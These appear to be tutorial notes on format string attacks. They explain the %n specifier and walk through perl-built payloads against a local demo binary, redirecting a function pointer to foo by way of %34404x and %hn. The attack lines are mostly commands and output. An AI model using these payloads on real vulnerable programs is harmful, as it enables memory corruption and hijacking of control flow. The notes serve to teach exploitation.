# String Format Attack

## Concept
- Use %n
    * Print nothing, but write number of characters successfully written so far into an integer pointer parameter
    * For attackers, store addree you want to modify in the format string
    * Use %Nx to control "number of characters", for example %10x

## Demo
### Try to get the offset of format string
    $ ./a.out `perl -e 'print "%x."x12'`
    Address of foo is 0x80486b3
    Address of fErrFunc is 0xbffff67c
    Cannot find 804884a.bffffac2.3f3.d696910.80482a1.80485d1.6e6e6143.6620746f.20646e69.252e7825.78252e78.2e78252e.
    Calling ErrFunc 0x80485d1

### The offset might be 10
    $ perl -e 'print "\x25\x2e\x78\x25"'
    %.x

### The address of fErrFunc is `0xbffff67c`, Calling ErrFunc `0x8040057`
    $ ./a.out `perl -e 'print "\x7c\xf6\xff\xbf".  "%x."x8 . "%1x" . "%hn"'`
    Address of foo is 0x80486b3
    Address of fErrFunc is 0xbffff67c
    Cannot find |▒▒▒804884a.bffffac4.3f3.d696910.80482a1.80485d1.6e6e6143.6620746f.20646e69
    Calling ErrFunc 0x8040057

### Adjust number of character for ErrFunc
    $ ./a.out `perl -e 'print "\x7c\xf6\xff\xbf".  "%x."x8 . "%10x" . "%hn"'`
    Address of foo is 0x80486b3
    Address of fErrFunc is 0xbffff67c
    Cannot find |▒▒▒804884a.bffffac3.3f3.d696910.80482a1.80485d1.6e6e6143.6620746f.  20646e69
    Calling ErrFunc 0x8040059

### The target address is foo. Calculate offset
    $ perl -e 'print 0x80486b3 - 0x8040059 + 10'
    34404

### Go
    $ ./a.out `perl -e 'print "\x7c\xf6\xff\xbf".  "%x."x8 . "%34404x" . "%hn"'`
    Calling ErrFunc 0x80486b3
    Augh! We've been hacked!
